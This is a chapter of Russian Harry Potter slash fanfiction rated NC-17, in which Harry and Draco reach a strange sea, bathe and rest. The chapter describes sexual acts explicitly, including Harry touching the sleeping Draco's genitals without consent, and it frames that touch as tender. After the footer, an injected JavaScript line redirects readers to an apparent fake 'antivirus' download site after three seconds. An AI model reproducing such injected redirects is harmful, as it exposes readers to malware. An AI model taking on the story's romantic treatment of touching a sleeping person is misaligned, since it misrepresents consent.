Ничья земля

Автор: Umbridge
Пайринг: Гарри Поттер/Драко Малфой
Рейтинг: NC-17
Жанр: action/agnst/romance
Саммари: Добро пожаловать! Вас приветствует НИЧЬЯ ЗЕМЛЯ! Забудьте все, чем вы были раньше. Здесь нет власти, но есть правила. Соблюдайте их - и вы выиграете!
Предупреждение: гет в 10 и 11 главах. ГП/ДУ, ДМ/НЖП, АУ 7 книги

Глава 4. Море желаний.

(Глава, в которой путешественникам удается перевести дух, Гарри впервые видит море, а Драко приобретает эротический опыт)

Следуя за Гарри по темному коридору, Драко думал с удивлением: «Как странно, что я все еще помню тонкости этикета». Ведь этикет не имел отношения к его жизни в последний год. Не имел ничего общего с голодом и страхом, с выживанием и нервным истощением. Он вспоминал, как стоял, согнувшись над раковиной. Громоздкой старой фарфоровой раковиной, точной копией такой же в туалете для мальчиков в Хогвардсе. Только не было Плаксы Миртл, и его родители давно погибли. Драко рвало, и он никак не мог справиться со спазмами, хотя еду было жалко до судорог. Ее всегда давали так мало. Он не знал, когда удастся поесть в следующий раз.

- Эй, Малфой… – позвал Гарри.

- А? – Драко вздрогнул и растерянно уставился парню в спину.

- По моему стало светлее, - задумчиво сказал тот, - мне кажется, что мы скоро выйдем на поверхность.

- С чего это вдруг, а? – поинтересовался Драко, вымученно ухмыляясь.

- С того это, - передразнил Гарри, - что мы уже давно идем вверх, и видно стало лучше, и, вдохни, воздух другой, свежее.

- Не знаю даже – радоваться мне или огорчаться, - ядовито процедил Драко, - где гарантия, что в конце этого дурацкого коридора нас не ждет еще один, длиннее и мрачнее, так?

- Не так, Малфой. Смотри на вещи с большим оптимизмом. Вряд ли мрачнее, а если даже длиннее, зато другой, а это уже радует, – философски рассудил Гарри.

- Тебя радует? – отозвался Драко уныло, - ты такой наивный, Потти! Как мило, я сейчас расплачусь!

Слова Гарри отчего-то разозлили его. Внезапно навалилась усталость. Он почувствовал, что невыносимо хочет спать.

- Не плачь, Малфой, - хмыкнул Гарри, - не заставляй меня тебя утешать.

- Ой ли, ой ли, - протянул Драко, - ты пожалуй утешишь.

Мрак в коридоре рассеивался, исчезая в трещинах между камнями. На влажной поверхности сверкали первые лучи еще невидимого солнца. Пройдя несколько футов по сырому подземелью, мальчики вышли на поверхность. Драко осмотрелся вокруг, моргая отвыкшими от света глазами. В голове у него слегка прояснилось.

- Поттер,- сказал он, - смотри-ка, солнышко…

- Да… - отозвался Гарри, глядя вверх и улыбаясь, - какое бы оно ни было, это лучше чем никакого.

- Как ни странно, но ты прав, - хмыкнул Драко, щурясь на тусклое в красном мареве закатное солнце. Налюбовавшись, он отвел взгляд и неожиданно воскликнул, - а это что?! Там впереди! Это же вода…  Или нет?

- Да, вроде бы, - согласился Гарри, посмотрев туда, куда указывал слизеринец.

- Похоже на большое озеро, - протянул тот, - или на море, только оранжевое.

- Пусть будет море, мне так больше нравится, - сказал никогда не видевший моря Гарри, глядя на воду, сливавшуюся на горизонте с бледным темнеющим небом.

- Не знаю, куда мы вышли, но в одном я уверен – нам надо отдохнуть, - вздохнул гриффиндорец.

- Поттер, в таком месте нас могут подстерегать опасности. Откуда ты знаешь, кто или что плавает в глубине этого… хм … водоема? – слабо возразил Драко, - с чего тебе вздумалось отдыхать именно здесь? А не парой миль  левее, например?

- Малфой, - Гарри повернулся к слизеринцу, невольно отмечая, что тот еще больше осунулся и побледнел, - ты снова хочешь провернуть трюк с холмом? Будем до темноты бродить по пустыне и бесконечно выходить к берегу моря? Послушай. Здесь нельзя повернуть назад, ни при каких условиях.

- Хорошо, - согласился Драко, которому хотелось переложить груз ответственности на плечи кого-то смелого и решительного, - предположим. Но мы хотя бы можем не ходить к воде и просто остаться на том месте, где стоим.

- Если хочешь, можешь остаться, - пожал плечами Гарри и спокойно улыбнулся. Драко с удивлением обнаружил, что тот, грязный и утомленный дорогой, все же выглядит уверенным и собранным.

- Однако, - продолжал Гарри, и его улыбка стала шире, - я считаю, что неплохо бы искупаться, и если это и правда вода, а не кислота, или еще что-нибудь в этом роде, я так и сделаю. Интуиция мне подсказывает, что все будет в порядке.

С этими словами гриффиндорец повернулся и быстрым шагом направился в сторону омываемого оранжевыми волнами берега.

- Ты шутишь, Поттер?! – крикнул ему в спину Драко, в нерешительности переминавшийся с ноги на ногу, - Ты ненормальный, это же очевидно!

Но его голос утонул в морском гуле, а Гарри не собирался поворачивать назад. Поэтому, подавленный перспективой остаться в одиночестве, Драко поспешил догнать своего врага.

Тот подошел к самой воде, настолько прозрачной, что было видно каменистое дно. Протерев очки рукавом плаща, Гарри наклонился и снял ботинок. Осторожно коснулся им лизнувшей берег волны. Затем внимательно осмотрел. Никаких повреждений, трещин, пузырей и прочего не было. Гарри разулся, и, оставив ботинки с носками на неожиданно теплой гальке, сделал шаг вперед.

- Поттер! – раздался сзади встревоженный голос. Гарри обернулся и увидел Малфоя, застывшего в нескольких футах от него.

 - Ты в своем уме? В другой ситуации мне было бы наплевать, соберись ты повторить судьбу своего драгоценного Муди и лишится ноги, но сейчас ты нужен мне живым и невредимым, – процедил тот нарочито холодно, нервно разглаживая складки мантии.

- Успокойся, - как можно более уверенно ответил Гарри, делая еще шаг, - все будет нормально, я же сказал.

- Не надо меня успокаивать, я и так спокоен, - огрызнулся Драко, разозлившись. Ему показалось, что у того надменный тон, - у тебя комплекс героя. Так и норовишь доказать, какой ты храбрый.

Гарри не ответил. Его ноги омыла волна, и он невольно вздрогнул. Как и галька, вода оказалась теплой. Она ласкала уставшие ступни, возбуждая желание окунуться и разгоняя волны руками, поплыть к горизонту.

- Ну, что ты молчишь? – протянул Драко, и Гарри на секунду показалось, что слизеринец сейчас топнет ногой, как какая-нибудь тринадцатилетняя капризная девчонка, - или тебе просто нечего мне ответить, моя правота так очевидна?

- Малфой, сними ботинки, попробуй, какая вода отличная! – он повернулся к Драко. Тот теперь сложил руки на груди и повесил на лицо маску высокомерия:

- Вот еще!

- Ну, как знаешь, - Гарри пожал плечами. Оттащил ботинки подальше  от темной полосы, туда, куда не доставали волны, и начал раздеваться. Драко проводил его взглядом. Наблюдая за тем, как гриффиндорец неспеша снимает плащ, мантию, аккуратно сворачивает их, затем стягивает рубашку-поло и брюки, он поймал себя на мысли, что очень хочет помыться. С чем, с чем, а с купаниями в замке Лестранжей, где Драко готовил яды по приказу Лорда, было все в порядке. Если еда являлась огромной редкостью, то воды им хватало. Конечно, это вовсе не походило на ванну в Малфой-менор, где он любил лежать часами, набирая и спуская пену, и даже на ванну старост в Хогвардсе, но все же. А сейчас Драко ощутил, как пахнет потом одежда, какими пыльными стали волосы. Сколько тысяч раз он мечтал  увидеть, как Поттер  раздевается. И вот, когда это происходит, Драко думает о ванной. Его взгляд скользнул по ногам Гарри. Где-то на уровне бедер слизеринец помедлил. Сердце застучало в горле, толи от возбуждения, толи от страха. Наконец, набравшись смелости, он поднял глаза выше. Драко хотел только взглянуть и отвернуться, но не смог. Глаза изучали темные волосы на лобке, крупный пенис.

- Малфой… Эй, Малфой! – позвал Гарри. Драко, застигнутый врасплох, неловко отвел взгляд и спрятал дрожащие руки в карманы мантии.

- Я пошел. Если что, - Гарри вздохнул, с удивлением отмечая, что слизеринец странно дернулся и посмотрел куда-то в сторону камней, - полагаюсь только на тебя.  Ты плавать то умеешь?

- Умею, не беспокойся, - нарочито манерно ответил Драко, стараясь скрыть неловкость и не смотреть Поттеру в лицо. А тем более ниже.

- Это радует, - Гарри кивнул и пошел к воде. Драко кинул прощальный взгляд на его спину и глубоко вздохнул. Скинув туфли, он развязал подвязки и стянул шелковые чулки, которые не рвались только благодаря наложенным на них чарам.

Решив освежиться и ополоснуть уставшие ноги, Драко осторожно приблизился к воде и вошел по колено. Одной рукой поднимая полы мантии и нижней рубашки, плеснул водой на бедра. Было не удобно, но оголиться перед Поттером казалось Драко ужасно неловким. По правде говоря, ни одна живая душа не видела его совершенно голым. Если, конечно, не брать в расчет маму, но это было в глубоком детстве. Драко пошатнулся и чуть не упал. Выругавшись сквозь зубы, он задрал мантию и рубашку немного выше.

- И долго ты будешь так корячиться? – спросил Гарри, подплывая слева, - смешно смотреть, правда.

Драко вспыхнул:

- Посмотри на себя и обхохочешься.

- Разденься, Малфой.  Здесь нет девчонок. Мы же оба парни. Чего стесняться? – пожал плечами тот и встал на ноги, поднявшись над водой по пояс.

- Я уж как-нибудь разберусь без твоих советов, Шрамоголовый, - холодно протянул Драко и вышел на берег. Не было никаких вариантов помыться и при этом остаться в одежде. Слизеринец с тоской смотрел на ласковое море, мучительно стараясь подавить страх обнажиться. В конце концов, собравшись с духом, медленно стянул мантию, нижнюю рубашку, и, прикрывшись руками, пошел к воде.

Гарри поймал себя на том, что рассматривает Малфоя: его белый живот, жилистые бедра, тонкие руки. В свете заходящего солнца нагота завораживала, и он почувствовал, как тяжелеет в паху. Гарри стало не по себе.

- Поттер, хватит пялиться, - ледяным тоном кинул Драко, заходя в воду.

- Мерлин, Малфой! Вокруг только вода и галька. Куда же мне еще смотреть? – сухо ответил он, и, окунувшись, поплыл, широко загребая руками оранжевую воду. Гарри старался унять внезапно нахлынувшее волнение, он ощущал смятение и неловкость. «Это же хорек» - крутились в голове лихорадочные мысли, - «Я могу его жалеть, но хотеть его… Что за бред?».

- Смотри на воду, - донеслось со стороны берега. Драко решил далеко не заходить и помыться на мелководье.

Спустя полчаса, искупавшись, мальчики оделись. Застегивая мантию, Гарри с усмешкой наблюдал за Драко, подвязывающим тонкие, до колен чулки, натягивающим кружевную, с причудливой вышивкой нательную рубашку. Вычурные пряжки на туфлях окончательно добили Гарри, и он, с трудом сдерживая расползающуюся по лицу ухмылку, достал из дамблдоровской котомки два сэндвича с  мясом и две маленькие картофелины.

- Ну, приятного аппетита, Малфой, - сказал он, протягивая угощение подоспевшему слизеринцу. Тот взял и, не сдержавшись, широко зевнул, прикрыв рот зажатой в руке клубнем.

- Не знаю, готов ли я пожелать тебе того же, Потти, - по привычке огрызнулся Драко. Впрочем, довольно вяло и мирно. Потом оба принялись жевать, молча глядя на спускающееся за горизонт солнце.

Драко думал о том, что возможно, здесь не так уж и плохо. Нет Лорда с его наказаниями и угрозами, есть еда и вода. Да и Поттер – компания гораздо более приятная, чем Снейп. А страх смерти… Последний год Драко каждый день просыпался и засыпал с этим чувством. Но сейчас рядом был Герой Всего Волшебного Мира. С ним он чувствовал себя в относительной безопасности. Мрачные сырые стены поместья Лестранжей не окружали их. Над головами гасло оранжевое небо, впереди колыхалось теплое, нежное море. Впервые в голову слизеринцу пришла мысль остаться здесь навсегда.

А Гарри думал о странных желаниях, охвативших его во время купания. У него давно никого не было. Возможно, в этом причина. Он бросил взгляд на Драко. Тот доел свой бутерброд, и теперь отчаянно зевал, каждый раз пряча лицо в колени.

«Но ведь правда. Не такой уж он и урод», - подумал гриффиндорец и невольно улыбнулся. На Ничьей земле эта мысль уже не раз приходила ему в голову. Словно не было здесь того вечно прилизанного слизеринца, невыносимого, вызывавшего желание поставить его на место. Теплый ветер деликатно касался недавно вымытых светлых волос, и Гарри тоже хотелось коснуться их. Он вздохнул и встал.

- Давай, ложись спать. Ты зеваешь каждую секунду, - сказал он, расстилая на земле плащ.

Драко посмотрел снизу вверх.

- Да, я, кстати, потерял свой. Не помню, говорил ли я уже об этом. И, как ты, конечно, знаешь, чистокровные волшебники не носят белья под мантиями, но не могу же я спать голым, так что… - он зевнул, прикрыв рот рукавом.

- Я понял, понял… Видишь – вот мой плащ. Ложись… - Гарри вздохнул обреченно, - и спасибо, Поттер. Да не за что, Малфой.

Драко хмыкнул. Устроившись поудобнее, он подложил под голову мешок и закрыл глаза.

Еще раз взглянув на слизеринца, Гарри повернулся и побрел по берегу, вдыхая сладкий, мягкий воздух, наполненный странными, волнующими запахами. Он не мог определить, что может так чудесно пахнуть здесь, среди песка и камней. Казалось, все наполнено щемящими звуками, тревожащими душу, и вместе с тем напоено тишиной. Гарри думал о прошедшем дне. Еще вчера в это же время он пил чай с Гермионой и Роном в Норе. Даже на секунду Гарри не предполагал оказаться в неизвестном месте в компании с Драко Малфоем. В Хогвартсе Гарри иногда вспоминал о хорьке, с какой-то тайной грустью и жалостью думал о нем, о том, жив ли он и куда пропал. Однако, вовсе не планировал бороться за свою жизнь и жизнь всего волшебного мира в одной связке со школьным врагом. Гарри вздохнул, наблюдая, как в потемневшую воду неверными бликами ложится лунный свет. Луна тут была совершенно такая же, как в его мире. Пора было возвращаться. Неспеша, он побрел обратно, и в темноте разглядел  расстеленный плащ и Драко на нем. Мальчик лежал, подложив под голову мешок Дамблдора. «Неплохо устроился», - подумал Гарри и улыбнулся с неожиданной нежностью. Присев на плащ, он внимательно посмотрел на Драко. Гарри никогда не видел лицо слизеринца так близко, и никогда не видел его таким беззащитным. Неожиданно для себя, Гарри положил руку на щиколотку Драко и провел ладонью вверх, задирая мантию и нижнюю рубашку. Желание, подобное тому, что застало гриффиндорца врасплох во время купания, охватило его сейчас. Гарри коснулся пальцами впадины под острым коленом, потом его рука поднялась выше, по  бедру к неприкрытым нижним бельем ягодицам, и скользнула к паху. Коснувшись мягких завитков, он, движимый странным любопытством, дотронулся до члена. И, будто опомнившись, отдернул руку. «Что со мной? Что я делаю?» - в замешательстве подумал он, и, игнорируя собственное вожделение, лег рядом с Драко. Гарри решил, что никогда не уснет, но, слушая глубокое дыхание соседа, почти сразу задремал.

            Драко выждал какое-то время и открыл глаза. Он сжал свой член под мантией. Осторожно, чтобы не разбудить Поттера, сделал несколько движений и кончил в кулак. Потом, тихо выдохнув, вытер ладонь о нижнюю рубашку и закрыл глаза. Все внутри него трепетало. В общепринятом смысле Драко был девственником. Никто до сегодняшнего вечера не касался его ТАМ. Хотя в действительности, конечно, он достаточно наигрался с самим собой еще во времена учебы в Хогвардсе. Ему даже удавалось трансфигурировать перо в дилдо. Но прикосновения Гарри Поттера… И какая разница, что за причины заставили Мальчика-Который-Выжил ласкать его, когда это было так приятно? Драко вздохнул, и в голову снова пришла мысль остаться на Ничьей земле. Здесь у него был Поттер, была еда, столько, сколько он мог съесть, была вода. А испытания рано или поздно закончатся. А там, откуда он попал сюда. Что ждало его там? Родители мертвы. Значит, не осталось ни одного создания в мире, которое могло бы заступиться за него, пожалеть, позаботиться о нем. Может быть, Темный Лорд убьет Драко сразу, как только тот вернется. Но даже если не успеет, и Поттер уничтожит Темного Лорда раньше,  Драко ждет Азкабан и долгие годы заключения. Или - смерть. Если же случится чудо, и его амнистируют, он не знает, что будет тогда. Дом разрушен. Деньги. Остались ли они? Позволят ли ему ими пользоваться? Ведь он – Упивающийся смертью. Правда никого не убил, но ведь пытался.

Драко снова открыл глаза, с тревогой вглядываясь в темные силуэты камней.

[1] Всю жизнь я прожила в тени, и никогда луч солнца не касался моего лица. Хотя мне не казалось, что это грустно, потому что я считала, что так должно быть. (Amber Benson «Under Your Spell»)

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>